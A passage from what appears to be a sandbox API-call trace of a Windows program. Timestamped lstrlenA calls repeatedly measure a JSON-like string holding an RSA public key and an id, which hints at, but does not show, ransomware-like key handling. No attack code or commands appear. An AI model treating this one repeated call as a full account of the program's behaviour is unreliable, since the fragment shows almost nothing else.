KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.244] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.245] lstrlenA (lpString="-----BEGIN PUBLIC 